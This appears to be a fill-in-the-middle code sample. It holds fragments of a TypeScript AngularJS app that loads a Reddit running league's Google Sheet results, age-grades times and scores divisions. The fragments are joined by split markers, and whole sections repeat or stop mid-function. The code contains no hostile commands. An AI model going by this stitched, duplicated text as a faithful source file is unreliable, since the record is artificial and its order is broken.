time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
function promiseFix($rootScope) {
// await fix -- runs a digest manually on await because it doesn't naturally
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]);
| { return this.events; } | conditional_block |
mooseleague_ts.ts | // to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
private buildUsers() {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) { return this.events; }
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplay = localStorage.getItem('autoplay2020') === null ? true : localStorage.getItem('autoplay2020') == 'true';
this.isMobile = isMobile();
this.autoplayKey = 'autoplay' + moment().year();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60); | } else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
getThemeUrl() {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
}
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].substr(0)
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
function promiseFix($rootScope) {
// await fix -- runs a digest manually on await because it doesn't naturally
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]); | random_line_split |
|
mooseleague_ts.ts |
// to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
private buildUsers() {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
